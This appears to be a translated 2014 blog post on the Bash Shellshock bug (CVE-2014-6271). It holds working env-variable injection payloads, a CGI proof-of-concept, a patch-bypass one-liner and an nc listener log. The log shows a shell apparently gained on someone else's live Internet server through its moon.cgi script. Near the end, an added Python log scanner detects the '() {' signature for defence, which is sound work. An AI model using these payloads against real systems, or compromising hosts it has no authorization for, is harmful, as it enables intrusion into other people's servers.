Bash vulnerability: CVE-2014-6271 verification and exploitation

Posted by 美国西岸机房 (US West Coast Data Center) on 2014-09-26

Stéphane Chazelas recently discovered a bug in Bash in the way it handles environment variables. The vulnerability affects Bash versions 1.14 through 4.3.

Affected distributions include:

Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
CentOS (versions 5 through 7)
Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
Debian

Local test method

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
[Image 1]

The above is my test result on Kali.
Remote test method:
First, write a CGI script in Bash:
root@kali:/usr/lib/cgi-bin# cat bug.sh 
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
Put it in /usr/lib/cgi-bin and then access it with curl:
[Image 2]

It prints the environment variables, which shows the CGI is reachable. Next we get a reverse shell.
[Image 3]

Access it and see the result:
[Image 4]

Other follow-up tests are still in progress.

Note: the Android build of bash is also affected.
[Image 5]

References:
http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
Real-world Internet test example:
root@kali:~# nc -vvlp 8080
listening on [any] 8080 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41997
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),50001(gforge),50002(stats),50003(news),50006(tmp)
$ exit
sent 8, rcvd 161
One successful exploitation, and surprisingly this one was a Perl script, so CGI execution is affected too. Thought: could it be because of the #! line, launching... launching... ^_^
sh-4.1$ head moon.cgi
head moon.cgi
#!/usr/bin/perl
#
# moon.cgi
#       Display a Moon image using the skycalc  program
#     by John Thorstensen and images generated by mp.
#
# Brian Casey
# Imagiware, Inc.

The Perl CGI on my own machine could not be exploited; I guess it depends on the web server. Ah, still not enough knowledge.
The foreign article mentions the following conditions:
Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).
ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.
The moon.cgi Perl script above probably calls something like open/exec, which forked bash.
Also, the patch that was released apparently can be bypassed too; see here:
https://twitter.com/taviso/status/514887394294652929
Exploit:
env lol='() { (nothing)=>' sh -c "echo date"; echo "vulnerable"
The SSH exploitation the foreigners describe requires an account; it is more of a privilege bypass. See:
https://about.gitlab.com/2014/09/24/gitlab-shell-and-bash-cve-2014-6271/
Snort protection rules from abroad:
http://www.volexity.com/blog/?p=19
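As an added defensive example (not part of the original post or of the Snort rules linked above), the following Python snippet applies the same signature idea to web server logs: it flags any request field whose value carries the Bash function-definition prefix "() {", in plain or percent-encoded form, since CGI copies headers such as User-Agent, Referer and Cookie straight into the environment. The extended log format and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Signature for the Shellshock trigger: a value that contains a Bash function
# definition prefix "() {". Whitespace between the parentheses and the brace
# is tolerated, as the published signatures for CVE-2014-6271 do.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed Apache-style combined log format, extended with the Cookie
# header: ip ident user [time] "request" status bytes "referer" "ua" "cookie"
LOG_FORMAT_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

def is_shellshock_payload(value: str) -> bool:
    """Return True if the value carries the '() {' prefix, plain or URL-encoded."""
    if SHELLSHOCK_RE.search(value):
        return True
    # Decode twice so a single or double percent-encoded payload is also caught.
    return bool(SHELLSHOCK_RE.search(unquote(unquote(value))))

def scan_log(lines):
    """Return (line_number, field_name, value) for every field that matches."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = LOG_FORMAT_RE.match(line)
        if not m:
            continue  # unparseable line; a real scanner would count these
        for field in ("req", "referer", "ua", "cookie"):
            if is_shellshock_payload(m.group(field)):
                hits.append((n, field, m.group(field)))
    return hits

# Constructed sample log lines: one benign curl request, one with the payload in
# User-Agent, one with the same payload percent-encoded in Referer, one benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Sep/2014:10:00:01 +0800] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "-" "curl/7.38.0" "-"',
    '10.0.0.9 - - [26/Sep/2014:10:00:07 +0800] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable" "-"',
    '10.0.0.9 - - [26/Sep/2014:10:00:09 +0800] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "%28%29%20%7B%20%3A%3B%7D%3B%20echo%20vulnerable" "Mozilla/5.0" "-"',
    '10.0.0.2 - - [26/Sep/2014:10:00:12 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux) Firefox/32.0" "session=abc123"',
]

if __name__ == "__main__":
    for n, field, value in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspicious {field} value: {value!r}")
```

Matching on the "() {" prefix catches the trigger regardless of which command follows it, so the rule does not need to know the attacker's payload.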
Another real-world reverse shell example from the Internet:
[Image 6]

[Image 7]

Original article from 零度科技 (Lingdu Technology): http://www.ldisp.com/a/linux/2014/bash-bug-2014-6271.shtml